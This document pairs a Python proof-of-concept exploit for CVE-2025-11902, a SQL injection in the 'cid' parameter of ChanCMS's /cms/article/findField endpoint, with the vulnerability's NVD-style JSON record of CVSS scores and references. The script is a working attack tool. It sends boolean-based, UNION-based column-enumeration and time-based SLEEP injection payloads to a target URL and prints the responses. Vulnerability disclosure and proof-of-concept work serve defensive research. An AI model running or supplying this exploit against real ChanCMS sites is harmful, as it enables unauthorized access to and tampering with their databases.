CVE-2025-11902

# CVE-2025-11902 ChanCMS findField SQL Injection PoC # Vulnerability: SQL Injection via 'cid' parameter in /cms/article/findField # Affected: ChanCMS <= 3.3.2 # Author: NarcherAlter import requests TARGET_URL = "http://target.com/cms/article/findField" def exploit_sql_injection(target_url, cid_payload): """ Exploit SQL injection in the 'cid' parameter of findField endpoint. """ # Basic SQL injection payload using UNION-based technique payload = cid_payload params = { "cid": payload } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.get(target_url, params=params, headers=headers, timeout=10) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") print(f"[+] Response Body:\n{response.text[:2000]}") return response except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None def boolean_based_blind_sqli(target_url): """ Boolean-based blind SQL injection to extract database version. """ # Payload to test boolean-based blind injection payload = "1' AND 1=1-- -" # True condition resp_true = exploit_sql_injection(target_url, payload) payload = "1' AND 1=2-- -" # False condition resp_false = exploit_sql_injection(target_url, payload) if resp_true and resp_false: if len(resp_true.text) != len(resp_false.text): print("[+] Target is vulnerable to boolean-based blind SQL injection!") return True print("[-] Target may not be vulnerable or responses are identical.") return False def union_based_sqli(target_url): """ UNION-based SQL injection to extract data. """ # Determine number of columns first for i in range(1, 15): cols = ",".join([str(j) for j in range(1, i+1)]) payload = f"-1' UNION SELECT {cols}-- -" resp = exploit_sql_injection(target_url, payload) if resp and resp.status_code == 200 and "error" not in resp.text.lower(): print(f"[+] Number of columns: {i}") break def time_based_blind_sqli(target_url): """ Time-based blind SQL injection. """ import time payload = "1' AND SLEEP(5)-- -" start = time.time() exploit_sql_injection(target_url, payload) elapsed = time.time() - start if elapsed >= 5: print("[+] Target is vulnerable to time-based blind SQL injection!") return True return False if __name__ == "__main__": print(f"[*] Testing CVE-2025-11902 against {TARGET_URL}") print("[*] Test 1: Boolean-based blind SQL injection") boolean_based_blind_sqli(TARGET_URL) print("\n[*] Test 2: UNION-based SQL injection") union_based_sqli(TARGET_URL) print("\n[*] Test 3: Time-based blind SQL injection") time_based_blind_sqli(TARGET_URL)

{"cve": {"id": "CVE-2025-11902", "sourceIdentifier": "[email protected]", "published": "2025-10-17T14:15:45.613", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in yanyutao0402 ChanCMS up to 3.3.2. Affected by this vulnerability is the function findField of the file /cms/article/findField. Performing a manipulation of the argument cid results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chancms:chancms:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.3.2", "matchCriteriaId": "0B10CAA4-5D61-42E1-B3FF-BAC534A355B2"}]}]}], "references": [{"url": "https://github.com/NarcherAlter/Security_Note/blob/main/Vulnerability_Discovery/ChanCMSv3.3.2.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/NarcherAlter/Security_Note/blob/main/Vulnerability_Discovery/ChanCMSv3.3.2.md#cmsarticlefindfield", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.328912", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328912", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.670262", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}